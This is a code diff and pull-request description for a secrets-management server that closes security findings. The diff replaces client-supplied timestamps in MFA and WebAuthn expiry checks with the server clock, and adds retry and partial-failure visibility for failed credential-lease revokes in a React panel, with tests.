--- a/server/http/handlers/users_crud.go
+++ b/server/http/handlers/users_crud.go
@@ -553,11 +553,18 @@ func newMFAChallengeProxyWire(c *models.MFAChallenge) mfaChallengeProxyWire {
 }
 
 // mfaChallengeLookupBody is the wire body shared by GetActiveMFAChallenge and
-// ConsumeMFAChallenge below — both take the identical (token_hash, now) pair
-// storage.Storage's GetActiveMFAChallenge/ConsumeMFAChallenge already take.
+// ConsumeMFAChallenge below. It used to also carry a caller-supplied `now`
+// that was passed straight into the expiry comparison — removed (G-wave6):
+// a remote caller could set `now` to a moment before the challenge's real
+// expiry to keep an already-expired challenge usable past its TTL, or to a
+// far-future moment to force a live challenge to appear expired. Every
+// in-process caller of the same storage methods (internal/core/webauthn.go's
+// BeginWebAuthnLogin/FinishWebAuthnLogin, internal/core/mfa.go's
+// VerifyMFACredentials) already computes the comparison time itself via
+// c.now() (= time.Now()) rather than accepting it as input; this handler now
+// does the same instead of trusting the wire.
 type mfaChallengeLookupBody struct {
-	TokenHash string    `json:"token_hash"`
-	Now       time.Time `json:"now"`
+	TokenHash string `json:"token_hash"`
 }
 
 // GetActiveMFAChallenge handles POST /api/v1/users/mfa-challenge/active (#522) —
@@ -590,11 +597,17 @@ func (h *UserHandler) GetActiveMFAChallenge(w http.ResponseWriter, r *http.Reque
 		sendError(w, "InvalidJSON", errInvalidJSON, http.StatusBadRequest, nil)
 		return
 	}
-	if body.TokenHash == "" || body.Now.IsZero() {
-		sendError(w, "ValidationError", "token_hash and now are required", http.StatusBadRequest, nil)
+	if body.TokenHash == "" {
+		sendError(w, "ValidationError", "token_hash is required", http.StatusBadRequest, nil)
 		return
 	}
-	ch, err := h.coreService.Storage().GetActiveMFAChallenge(r.Context(), body.TokenHash, body.Now)
+	// Use this server's own clock for the expiry comparison — never a
+	// caller-supplied value; see mfaChallengeLookupBody's doc comment. No
+	// .UTC(): models.MFAChallenge has no BeforeSave UTC-normalization hook,
+	// so ExpiresAt is written using c.now()'s (= time.Now()'s) own Location,
+	// matching this codebase's established GORM/SQLite comparison convention
+	// (see dynamic_secrets_proxy.go / retention_proxy.go).
+	ch, err := h.coreService.Storage().GetActiveMFAChallenge(r.Context(), body.TokenHash, time.Now())
 	if err != nil {
 		sendError(w, "NotFound", "invalid or expired challenge", http.StatusNotFound, nil)
 		return
@@ -628,11 +641,14 @@ func (h *UserHandler) ConsumeMFAChallenge(w http.ResponseWriter, r *http.Request
 		sendError(w, "InvalidJSON", errInvalidJSON, http.StatusBadRequest, nil)
 		return
 	}
-	if body.TokenHash == "" || body.Now.IsZero() {
-		sendError(w, "ValidationError", "token_hash and now are required", http.StatusBadRequest, nil)
+	if body.TokenHash == "" {
+		sendError(w, "ValidationError", "token_hash is required", http.StatusBadRequest, nil)
 		return
 	}
-	ch, err := h.coreService.Storage().ConsumeMFAChallenge(r.Context(), body.TokenHash, body.Now)
+	// Use this server's own clock for the expiry comparison — never a
+	// caller-supplied value; see mfaChallengeLookupBody's doc comment above
+	// GetActiveMFAChallenge.
+	ch, err := h.coreService.Storage().ConsumeMFAChallenge(r.Context(), body.TokenHash, time.Now())
 	if err != nil {
 		sendError(w, "NotFound", "invalid or expired challenge", http.StatusNotFound, nil)
 		return

--- a/server/http/handlers/webauthn_proxy.go
+++ b/server/http/handlers/webauthn_proxy.go
@@ -408,10 +408,14 @@ func (h *AuthHandler) CreateWebAuthnSessionProxy(w http.ResponseWriter, r *http.
 }
 
 // webAuthnSessionConsumeProxyBody is the wire body for
-// ConsumeWebAuthnSessionProxy.
+// ConsumeWebAuthnSessionProxy. It used to also carry a caller-supplied `now`
+// forwarded straight into the expiry comparison — removed (G-wave6, same
+// class as users_crud.go's mfaChallengeLookupBody): a remote caller could
+// manipulate the effective "current time" used to decide whether a WebAuthn
+// ceremony session is still valid. This server now always uses its own
+// clock for that comparison.
 type webAuthnSessionConsumeProxyBody struct {
-	TokenHash string    `json:"token_hash"`
-	Now       time.Time `json:"now"`
+	TokenHash string `json:"token_hash"`
 }
 
 // ConsumeWebAuthnSessionProxy handles POST
@@ -431,11 +435,16 @@ func (h *AuthHandler) ConsumeWebAuthnSessionProxy(w http.ResponseWriter, r *http
 		writeRemoteAPIError(w, http.StatusBadRequest, "INVALID_BODY", errInvalidBody)
 		return
 	}
-	if body.TokenHash == "" || body.Now.IsZero() {
-		writeRemoteAPIError(w, http.StatusBadRequest, "INVALID_BODY", "token_hash and now are required")
+	if body.TokenHash == "" {
+		writeRemoteAPIError(w, http.StatusBadRequest, "INVALID_BODY", "token_hash is required")
 		return
 	}
-	sess, err := h.coreService.Storage().ConsumeWebAuthnSession(r.Context(), body.TokenHash, body.Now)
+	// This server's own clock, never a caller-supplied value — see
+	// webAuthnSessionConsumeProxyBody's doc comment. No .UTC(): no
+	// BeforeSave hook normalizes models.WebAuthnSession.ExpiresAt, so writes
+	// (internal/core/webauthn.go's c.now()) and reads must share the same
+	// (local) Location convention.
+	sess, err := h.coreService.Storage().ConsumeWebAuthnSession(r.Context(), body.TokenHash, time.Now())
 	if err != nil {
 		writeRemoteAPIError(w, http.StatusNotFound, "NOT_FOUND", "invalid or expired webauthn session")
 		return

--- a/web/src/features/dynamic-secrets/LeasesPanel.tsx
+++ b/web/src/features/dynamic-secrets/LeasesPanel.tsx
@@ -72,6 +72,14 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
 
     const [credential, setCredential] = useState<IssuedCredential | null>(null);
     const [error, setError] = useState('');
+    // Surfaces the outcome of a "Revoke all" call — distinct from `error`, which
+    // is for the mutation itself failing outright (network/authz). A revoke-all
+    // call can succeed at the HTTP layer while some individual leases still fail
+    // to revoke upstream (see revokeAll's {revoked, failed} response below); that
+    // partial failure must not look identical to a full success.
+    const [revokeAllNotice, setRevokeAllNotice] = useState<{ type: 'success' | 'warning'; message: string } | null>(
+        null
+    );
 
     // G28: the credential (often a plaintext password) otherwise stays rendered
     // in the modal indefinitely until the user explicitly clicks Done/Close —
@@ -83,6 +91,7 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
 
     const handleIssue = () => {
         setError('');
+        setRevokeAllNotice(null);
         issue.mutate(undefined, {
             onSuccess: (cred) => setCredential(cred),
             onError: (err) => surface(err, 'Failed to issue credential.'),
@@ -114,25 +123,37 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
                                 · expires {new Date(l.expiresAt).toLocaleString()}
                             </span>
                         )}
-                        {canManage && l.status === 'active' && (
+                        {/* A failed revoke means the credential is STILL LIVE upstream (see
+                            CountActiveLeases/ListExpiredActiveLeases treating revoke_failed as
+                            active) — surface why it failed so the operator isn't left guessing. */}
+                        {l.status === 'revoke_failed' && l.revokeError && (
+                            <span
+                                className="truncate"
+                                style={{ color: 'var(--error)' }}
+                                title={l.revokeError}
+                            >
+                                {l.revokeError}
+                            </span>
+                        )}
+                        {canManage && (l.status === 'active' || l.status === 'revoke_failed') && (
                             <button
                                 type="button"
                                 onClick={() => {
-                                    if (
-                                        !window.confirm(
-                                            'Revoke this lease? The credential will stop working immediately.'
-                                        )
-                                    )
-                                        return;
+                                    const confirmMessage =
+                                        l.status === 'revoke_failed'
+                                            ? 'Retry revoking this lease? The credential is still live upstream until this succeeds.'
+                                            : 'Revoke this lease? The credential will stop working immediately.';
+                                    if (!window.confirm(confirmMessage)) return;
                                     setError('');
+                                    setRevokeAllNotice(null);
                                     revoke.mutate(l.leaseId, {
                                         onError: (err) => surface(err, 'Failed to revoke lease.'),
                                     });
                                 }}
                                 disabled={revoke.isPending}
-                                className="ml-auto p-1 rounded-sm disabled:opacity-50"
+                                className="ml-auto p-1 rounded-sm disabled:opacity-50 shrink-0"
                                 style={{ color: 'var(--error)' }}
-                                title="Revoke lease"
+                                title={l.status === 'revoke_failed' ? 'Retry revoke' : 'Revoke lease'}
                             >
                                 <NoSymbolIcon className="h-4 w-4" />
                             </button>
@@ -145,6 +166,15 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
     return (
         <div className="px-4 py-3" style={{ backgroundColor: 'var(--bg-app)' }}>
             {error && <Alert type="error" message={error} className="mb-2" />}
+            {revokeAllNotice && (
+                <Alert
+                    type={revokeAllNotice.type}
+                    message={revokeAllNotice.message}
+                    dismissible
+                    onDismiss={() => setRevokeAllNotice(null)}
+                    className="mb-2"
+                />
+            )}
 
             {canManage && (
                 <div className="flex items-center gap-2 mb-3">
@@ -164,7 +194,18 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
                                 )
                                     return;
                                 setError('');
+                                setRevokeAllNotice(null);
                                 revokeAll.mutate(undefined, {
+                                    onSuccess: ({ revoked, failed }) => {
+                                        if (failed > 0) {
+                                            setRevokeAllNotice({
+                                                type: 'warning',
+                                                message: `Revoked ${revoked} of ${revoked + failed} lease(s) — ${failed} failed. Check the lease list below and retry the failed one(s).`,
+                                            });
+                                        } else {
+                                            setRevokeAllNotice({ type: 'success', message: `Revoked ${revoked} lease(s).` });
+                                        }
+                                    },
                                     onError: (err) => surface(err, 'Failed to revoke leases.'),
                                 });
                             }}

--- a/web/src/features/dynamic-secrets/LeasesPanel.tsx
+++ b/web/src/features/dynamic-secrets/LeasesPanel.tsx
@@ -127,11 +127,7 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
                             CountActiveLeases/ListExpiredActiveLeases treating revoke_failed as
                             active) — surface why it failed so the operator isn't left guessing. */}
                         {l.status === 'revoke_failed' && l.revokeError && (
-                            <span
-                                className="truncate"
-                                style={{ color: 'var(--error)' }}
-                                title={l.revokeError}
-                            >
+                            <span className="truncate" style={{ color: 'var(--error)' }} title={l.revokeError}>
                                 {l.revokeError}
                             </span>
                         )}
@@ -203,7 +199,10 @@ export const LeasesPanel: React.FC<{ configId: number; canManage: boolean }> = (
                                                 message: `Revoked ${revoked} of ${revoked + failed} lease(s) — ${failed} failed. Check the lease list below and retry the failed one(s).`,
                                             });
                                         } else {
-                                            setRevokeAllNotice({ type: 'success', message: `Revoked ${revoked} lease(s).` });
+                                            setRevokeAllNotice({
+                                                type: 'success',
+                                                message: `Revoked ${revoked} lease(s).`,
+                                            });
                                         }
                                     },
                                     onError: (err) => surface(err, 'Failed to revoke leases.'),

--- a/web/src/features/dynamic-secrets/__tests__/LeasesPanel.test.tsx
+++ b/web/src/features/dynamic-secrets/__tests__/LeasesPanel.test.tsx
@@ -239,6 +239,89 @@ describe('LeasesPanel', () => {
         expect(revokeAllMutate).toHaveBeenCalled();
     });
 
+    // A lease whose revoke attempt failed is still LIVE upstream (the backend
+    // treats revoke_failed as active — see CountActiveLeases/ListExpiredActiveLeases)
+    // so the operator must be able to see why it failed and retry from this panel.
+    describe('revoke_failed leases (incident-response gap)', () => {
+        it('shows a retry affordance and the revokeError message for a revoke_failed lease', () => {
+            leasesData = [
+                {
+                    leaseId: 'lease-failed',
+                    roleName: 'admin-role',
+                    status: 'revoke_failed',
+                    revokeError: 'target database unreachable: dial tcp: i/o timeout',
+                },
+            ];
+            render(<LeasesPanel configId={5} canManage />);
+
+            expect(screen.getByText('target database unreachable: dial tcp: i/o timeout')).toBeInTheDocument();
+            expect(screen.getByTitle('Retry revoke')).toBeInTheDocument();
+            expect(screen.queryByTitle('Revoke lease')).not.toBeInTheDocument();
+        });
+
+        it('does not render a revokeError message when the field is absent', () => {
+            leasesData = [{ leaseId: 'lease-failed', roleName: 'admin-role', status: 'revoke_failed' }];
+            render(<LeasesPanel configId={5} canManage />);
+
+            expect(screen.getByTitle('Retry revoke')).toBeInTheDocument();
+        });
+
+        it('retries revoking a revoke_failed lease via the same revoke mutation, after a distinct confirmation', () => {
+            leasesData = [
+                { leaseId: 'lease-failed', roleName: 'admin-role', status: 'revoke_failed', revokeError: 'timeout' },
+            ];
+            const confirmSpy = vi.spyOn(window, 'confirm').mockReturnValue(true);
+
+            render(<LeasesPanel configId={5} canManage />);
+            fireEvent.click(screen.getByTitle('Retry revoke'));
+
+            expect(confirmSpy).toHaveBeenCalledWith(expect.stringMatching(/retry revoking this lease/i));
+            expect(revokeMutate).toHaveBeenCalledWith('lease-failed', expect.anything());
+        });
+
+        it('hides the retry control for non-managers even on a revoke_failed lease', () => {
+            leasesData = [
+                { leaseId: 'lease-failed', roleName: 'admin-role', status: 'revoke_failed', revokeError: 'timeout' },
+            ];
+            render(<LeasesPanel configId={5} canManage={false} />);
+            expect(screen.queryByTitle('Retry revoke')).not.toBeInTheDocument();
+        });
+    });
+
+    // revokeAll's response carries a {revoked, failed} breakdown (api.ts) — a
+    // partial failure must be visibly distinct from a full success, not silently
+    // swallowed by only wiring onError.
+    describe('revoke all: partial-failure visibility', () => {
+        it('shows a warning notice distinguishing a partial failure from full success', () => {
+            leasesData = [
+                { leaseId: 'lease-1', roleName: 'role', status: 'active' },
+                { leaseId: 'lease-2', roleName: 'role2', status: 'active' },
+            ];
+            revokeAllMutate.mockImplementation((_vars, opts) => opts.onSuccess({ revoked: 4, failed: 2 }));
+            vi.spyOn(window, 'confirm').mockReturnValue(true);
+
+            render(<LeasesPanel configId={5} canManage />);
+            fireEvent.click(screen.getByRole('button', { name: /revoke all/i }));
+
+            expect(screen.getByText(/revoked 4 of 6 lease\(s\) — 2 failed/i)).toBeInTheDocument();
+        });
+
+        it('shows a plain success notice (no partial-failure wording) when nothing failed', () => {
+            leasesData = [
+                { leaseId: 'lease-1', roleName: 'role', status: 'active' },
+                { leaseId: 'lease-2', roleName: 'role2', status: 'active' },
+            ];
+            revokeAllMutate.mockImplementation((_vars, opts) => opts.onSuccess({ revoked: 2, failed: 0 }));
+            vi.spyOn(window, 'confirm').mockReturnValue(true);
+
+            render(<LeasesPanel configId={5} canManage />);
+            fireEvent.click(screen.getByRole('button', { name: /revoke all/i }));
+
+            expect(screen.getByText('Revoked 2 lease(s).')).toBeInTheDocument();
+            expect(screen.queryByText(/failed/i)).not.toBeInTheDocument();
+        });
+    });
+
     it('closes the credential modal via the close (X) control and via Done', () => {
         issueMutate.mockImplementation((_vars, opts) =>
             opts.onSuccess({ leaseId: 'lease-x', username: 'u', password: 'p' })


### PR DESCRIPTION
## Summary

Wave 6 of the adversarial-review remediation campaign covers the 135 "singleton" findings that didn't cluster into a shared root-cause group with anything else. This PR closes every one of the 20 critical/high-severity singletons after re-verifying each against current `main` — 4 turned out to be stale (already fixed by earlier campaign rounds, or the finding's premise didn't hold up under direct reproduction) and are documented as such in the tracking doc rather than re-fixed; the remaining 16 are fixed here, each with its own regression test confirmed to fail pre-fix and pass post-fix.

**Stale, no code change (documented in tracking doc only):**
- `core-scim.json#0` (guardLastAdminDeactivation) — already fixed by an earlier round (`6d7b1383`)
- `core-oidc.json#0` (SAML JIT hardcoded emailVerified) — already fixed (prior #89)
- `core-secrets.json#1` (core-layer CreateFolder scope check) — same code an earlier round already fixed
- `config.json#3` (DEK/salt empty config) — finding's own premise doesn't reproduce; the salt check already fails closed before the described DEK gap is ever reached

**Fixed (16):**

1. **Rotation-policy cross-project secret scope leak** — `CreateRotationPolicy` never validated `ProjectID`/`EnvironmentID` consistency, and `scopedPolicySecrets`'s environment-scope branch left `ProjectID` unset, making the `ListSecrets` lookup unscoped across projects. Now validates/derives `ProjectID` from the environment's true owner and filters by both.
2. **Auth lockout counter cleared before MFA completes** — `VerifyPasswordCredentials` cleared the account's failed-login/lockout state right after a correct password, even when a second factor was still required — letting an attacker who knows the password but lacks MFA reset the lockout indefinitely. The clear now only fires once authentication is genuinely complete (`Login`, immediately before minting a session).
3. **Group-join SoD check missed same-group role-combination violations** — `validateGroupJoinRoles` checked each granted role individually; two roles landing together from the same group join could complete a forbidden SoD pair undetected. Now checks the full granted-role set atomically via a new `requireGroupJoinNoSoDViolation`.
4. **SCIM deprovision TOCTOU** — `DeprovisionSCIMUser` captured its working copy via an unlocked read before acquiring the account-state lock, then wrote that stale struct back — silently reverting a concurrent `SuspendUser` write in the race window. Now re-reads under `LockUserForUpdate` immediately before writing, mirroring its siblings.
5. **k8ssync deleted an entire multi-key Secret over one revoked key** — a single `ErrUpstreamGone` fetch failure aborted the whole `buildDesired` build, and `Reconcile` then deleted the whole target Secret, discarding unrelated live keys. Now drops only the affected key(s) and keeps the rest.
6. **secrettemplate injection guard incomplete** — only newline/CR/NUL were rejected; a single-line unquoted `.env` assignment with backtick/`;`/`|`/`&`/`<`/`>`/`$(` still executes when sourced. Guard extended to cover them.
7. **Audit hash-chain permanently unverifiable after any retention purge** — `VerifyAuditChain` always anchored at genesis; once retention purge removed the earliest rows, the chain could never verify again, on every install, forever. Adds a signed re-anchor mechanism (HMAC over the KEK-derived checkpoint key) so verification and checkpoint issuance recover after a sanctioned purge, while still catching unsanctioned deletion or a forged anchor.
8. **MFA/WebAuthn/step-up expiry checks trusted a client-supplied clock** — `GetActiveMFAChallenge`/`ConsumeMFAChallenge` (plus two undocumented sibling instances found during the sweep: `ConsumeWebAuthnSessionProxy`, `GetActiveMFAStepUpGrantProxy`) took `now` from the request body instead of the server's own clock, letting a caller extend or shorten a challenge's effective TTL. Server clock now used throughout; the client-supplied field removed.
9. **github-action install pin predated its own fail-open fix** — `entrypoint.sh`'s default install path pinned a commit SHA older than the fix that closed `install.sh`'s fail-open checksum-verification gap. Bumped, with a regression check blocking the stale SHA.
10. **Anomaly off-hours band could silently collapse to zero-width** — `SetBusinessHours` only rejected an explicit equal-and-valid collision; a partial update leaving one field at its hardcoded default could accidentally collide with the other, silently disabling off-hours detection with no error. Now validates strictly and checks the final merged band; `ApplyAnomalyConfig` no longer discards the error.
11. **Project-admin last-admin guard undercounted group-derived admins** — mirrors an earlier global-scope fix (`resolveGlobalAdminHolders`/G03): `guardLastProjectAdmin` treated any project-level group grant as a surviving admin without expanding to live members, and `ListProjectRoleAssignments` didn't filter soft-deleted groups. Now expands to live members at project scope via the same helper the global-scope fix already established.
12. **wire.go dumped the entire config, including secrets, to stdout** — `InitializeApp` printed the full config struct on every startup, exposing DB/API/SMTP/webhook secrets to whatever captures stdout (container/CI logs). Removed the value dump.
13. **AWS IAM key rotation TOCTOU race** — `GenerateUpstream`'s list→evict→create→delete sequence had no synchronization; a scheduled rotation racing a manual one for the same ref could hit AWS's 2-key cap or delete a key the other call just minted. Added a per-ref mutex serializing same-ref rotations within a process (a documented, narrower residual: cross-replica races would need a keyed distributed lock, out of scope here).
14. **Remote storage client followed an HTTPS→HTTP downgrade redirect** — `CheckRedirect` pinned only the host, not the scheme, on same-host redirects. Now rejects any same-host redirect off an `https` chain to a non-`https` scheme (loopback dev HTTP unaffected).
15. **Secrets usage-analytics leaked whole-project data to environment-scoped callers** — `UsageMostAccessed`/`UsageUnused` never read `environment_id` despite the route authorizing at project+environment scope. Now threads an optional environment scope through handler → core → storage.
16. **LeasesPanel gave no visibility into a failed lease revoke** — a `revoke_failed` lease (credential still live upstream) had no retry affordance, `revokeError` was never rendered, and a partial `revokeAll` failure looked identical to full success. Now surfaces retry + failure reason + a distinct partial-failure banner.

Plus one follow-up commit fixing 5 test fixtures (`compliance_posture_test.go` ×2, `compliance_evidence_test.go` ×2, `local_sharing_test.go`, `concurrency_purge_restore_race_test.go`, `handlers_s4_test.go`) that migrated `models.GroupRole` without `models.Group` — harmless before #11's new `groups` JOIN in `ListProjectRoleAssignments`, but a reachable path (`RestoreProject`'s admin-authority check) panicked against these bare fixtures afterward. Found via a repo-wide scan for the same AutoMigrate gap #11's own fix had already partially closed elsewhere.

## Test plan

- [x] Each of the 16 fixes has a dedicated regression test confirmed to fail against pre-fix code (via scoped `git stash` of just the production files) and pass post-fix.
- [x] `go build ./...` / `go vet ./...` / `gofmt -l` clean across the full repo.
- [x] `gosec -severity medium -exclude-generated ./...` — 0 issues across 789 files.
- [x] Full `go test ./...` green except pre-existing, machine-local failures confirmed identical on unmodified `main` (CLI dual-mode 30s connection-timeout tests from a stale local `~/.keyorix/cli.yaml`, and a handful of `RealServer`/RBAC-seed tests) — none caused by this PR.
- [x] Web: `LeasesPanel` fix — full `web/` suite (3022 tests), `tsc --noEmit`, `eslint` all clean.
- [x] Shell: `entrypoint.sh`/`entrypoint_test.sh` — `shellcheck` clean, 14/14 existing checks pass including the new regression.
- [x] Every branch independently re-verified from a fresh worktree off `origin/main` before integration (build/vet/gofmt/gosec/full relevant test suites), not trusted on self-report alone.